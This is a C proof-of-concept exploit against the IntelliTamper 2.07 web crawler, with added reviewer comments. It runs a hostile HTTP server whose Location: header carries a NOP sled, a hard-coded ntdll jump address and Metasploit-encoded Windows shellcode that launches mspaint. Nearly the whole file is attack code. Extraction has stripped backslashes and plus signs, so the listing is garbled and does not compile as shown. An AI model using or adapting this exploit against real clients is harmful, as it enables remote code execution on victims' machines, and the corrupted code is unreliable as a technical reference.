/**
** IntelliTamper 2.07 Location: HTTP Header Remote Code Execution exploit.
**
** Based on exploit by Koshi (written in Perl). This one should be more
** stable. Just for fun and to learn more about win32 exploitation.
**
** by Wojciech Pawlikowski (wojtekp@gmail.com)
**/
#include
#include
#include
#include
#include
#include
#include
#include
#include
/*
 * Constants shared with main() below.
 *
 * NOTE(review): the page extraction appears to have dropped characters
 * from this listing — the string literals below show bare hex pairs
 * such as "xeb" where C source would need a backslash escape.  The
 * text is left as it appears on the page; do not expect it to compile
 * as-is.
 */
#define BUFSIZE 1550                /* length of the oversized Location: value; also sizes the buffers in main() */
#define NOP 0x90                    /* x86 single-byte `nop` opcode used as filler */
#define RETADDR 0x7c941EED // jmp esp ntdll.dll
/* RETADDR is a hard-coded address inside one specific ntdll.dll build (see the
 * author's comment); it is only meaningful for that exact library version and
 * is the reason the PoC is tied to a single target configuration. */
/* win32_exec - EXITFUNC=thread CMD=mspaint Size=336 Encoder=Alpha2 http://metasploit.com */
/* Payload as described by the generator comment above: launches mspaint.
 * It is Alpha2-encoded, and the listing contains no 0x00 byte, which is what
 * lets main() measure it with strlen().  Declared unsigned char[] while
 * main() passes it to strlen()/memcpy() as char * — expect a sign
 * conversion warning from the compiler. */
unsigned char shellcode[] =
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x48x49x49x49x49x49x49x49x49x49x49x51x5ax6ax42"
"x58x30x42x31x50x41x42x6bx41x41x52x41x32x41x41x32"
"x42x41x30x42x41x58x50x38x41x42x75x6dx39x59x6cx69"
"x78x41x54x75x50x77x70x45x50x6cx4bx73x75x55x6cx4e"
"x6bx61x6cx33x35x54x38x55x51x7ax4fx4cx4bx70x4fx45"
"x48x4cx4bx33x6fx67x50x45x51x4ax4bx43x79x6cx4bx34"
"x74x4cx4bx47x71x6ax4ex64x71x6fx30x5ax39x6ex4cx4e"
"x64x4fx30x30x74x45x57x79x51x6bx7ax74x4dx37x71x5a"
"x62x4ax4bx5ax54x55x6bx31x44x71x34x55x54x71x65x4b"
"x55x6cx4bx73x6fx61x34x45x51x78x6bx65x36x6cx4bx36"
"x6cx50x4bx4ex6bx71x4fx57x6cx35x51x38x6bx4cx4bx77"
"x6cx6ex6bx77x71x6ax4bx4cx49x71x4cx37x54x34x44x7a"
"x63x54x71x39x50x61x74x6cx4bx43x70x46x50x4bx35x49"
"x50x72x58x46x6cx6cx4bx47x30x36x6cx6cx4bx70x70x37"
"x6cx4ex4dx4cx4bx65x38x46x68x7ax4bx64x49x4ex6bx4f"
"x70x6ex50x77x70x77x70x45x50x6cx4bx70x68x37x4cx63"
"x6fx64x71x49x66x73x50x31x46x6ex69x59x68x4bx33x69"
"x50x51x6bx30x50x32x48x5ax4fx5ax6ex69x70x45x30x33"
"x58x4cx58x6bx4ex4cx4ax76x6ex66x37x6bx4fx7ax47x30"
"x6dx53x43x62x50x53x51x73x59x32x4ex33x44x45x50x42";
/*
 * Entry point: a minimal TCP listener on port 80 that answers every
 * accepted connection with a single HTTP-style response whose
 * `Location:` header value is the oversized buffer built from BUFSIZE,
 * NOP, RETADDR and shellcode (all defined above).  The request the
 * client sends is read once and then ignored.
 *
 * Returns: main() never returns normally — the accept loop below is
 * `while (1)` with no break, so the trailing close(sockfd) is
 * unreachable and the only exits are the exit(-1) error paths.
 *
 * NOTE(review): the page extraction appears to have dropped `\` and
 * `+` characters throughout this function (e.g. `BUFSIZE 100`,
 * `i = 4`, `i )`, `overflow 550`, `req i`, `...n"`, `rnrn`).  The text
 * is kept exactly as it appears on the page; read the operators and
 * escapes accordingly rather than as valid C.
 */
int
main(void)
{
struct sockaddr_in serv_sin, cli_sin;
/* sin_len is passed to accept() as the address-length out-parameter, which
 * is declared socklen_t *; an int here compiles with a warning on platforms
 * where the two types differ. */
int i, sockfd, cli_sock, sock_opt = 1, sin_len;
/* buf receives (and discards) the client's request; req is the outgoing
 * response; overflow is heap-allocated per connection below. */
char *overflow, buf[BUFSIZE] = { 0 }, req[BUFSIZE 100] = { 0 };
sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sockfd < 0)
{
perror("socket()");
exit(-1);  /* exit(-1) yields status 255; EXIT_FAILURE is the portable spelling */
}
/* serv_sin is never zeroed, so sin_zero (and any padding) is left
 * uninitialized; memset(&serv_sin, 0, sizeof serv_sin) is the usual idiom. */
serv_sin.sin_family = AF_INET;
serv_sin.sin_port = htons(80);           /* listens on all interfaces, port 80 */
serv_sin.sin_addr.s_addr = INADDR_ANY;
/* SO_REUSEADDR lets the listener rebind quickly after a previous run. */
if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &sock_opt, sizeof(int)) < 0)
{
perror("setsockopt()");
close(sockfd);
exit(-1);
}
if (bind(sockfd, (struct sockaddr *)&serv_sin, sizeof(struct sockaddr)) < 0)
{
perror("bind()");
close(sockfd);
exit(-1);
}
listen(sockfd, 1);                       /* return value unchecked; a failure here surfaces later in accept() */
sin_len = sizeof(struct sockaddr);
printf("[*] Waiting for a connection...n");
while (1)
{
cli_sock = accept(sockfd, (struct sockaddr *)&cli_sin, &sin_len);
if (cli_sock < 0)
{
perror("accept()");
exit(-1);                                /* sockfd is not closed on this path (process exit reclaims it) */
}
printf("[ ] Connection from %s:%dn", inet_ntoa(cli_sin.sin_addr), ntohs(cli_sin.sin_port));
/* The request is read once into buf and never inspected; the return value
 * (byte count, 0 on EOF, -1 on error) is not checked. */
read(cli_sock, buf, sizeof(buf) - 1);
/* malloc() result is not checked, and `overflow` is never freed — one
 * allocation leaks per accepted connection.  The memory is also not
 * zeroed, which matters for the strlen(overflow) calls below. */
overflow = (char *)malloc(BUFSIZE 1);
/* Fills the buffer with RETADDR through a `long *` view.  On ILP32 targets a
 * long is 4 bytes, matching the 4-byte stride; on LP64 targets a long is
 * 8 bytes, so each store writes 8 bytes (the upper four being zero) and the
 * resulting byte pattern differs from the ILP32 one.  The cast is also a
 * strict-aliasing / alignment concern; memcpy() of a uint32_t would be the
 * well-defined form. */
for (i = 0; i <= 1540; i = 4)
*(long *)&overflow[i] = RETADDR;
/* Overwrites the first 1536 bytes with NOP filler. */
for (i = 0; i < 1536; i )
overflow[i] = NOP;
/* Places the payload inside the filler.  strlen(shellcode) relies on the
 * payload containing no 0x00 byte (true of the listing above). */
memcpy(overflow 550, shellcode, strlen(shellcode));
memcpy(overflow i 4, "xe9x14xfcxffxff", 5); // jmp -1000 - jump to our buffer
/* Builds the response.  sprintf() into req is bounded here only because the
 * format string is a fixed literal; snprintf(req, sizeof req, ...) would
 * make that explicit.  i holds the header prefix length afterwards. */
i = sprintf(req, "200 HTTP/1.1rnDate: 2008-07-24 20:14:31rnLocation: ");
/* strlen(overflow) assumes a terminating 0x00 exists somewhere inside the
 * malloc'd block; malloc() does not guarantee one, so without it this reads
 * past the allocation.  Tracking the length explicitly would avoid that. */
memcpy(req i, overflow, strlen(overflow));
memcpy(req i strlen(overflow), "rnrn", 4);
/* write() may return a short count; the result is not checked. */
write(cli_sock, req, strlen(req));
printf("[ ] Exploit sent!n");
close(cli_sock);
}
/* Unreachable: the loop above has no exit condition. */
close(sockfd);
}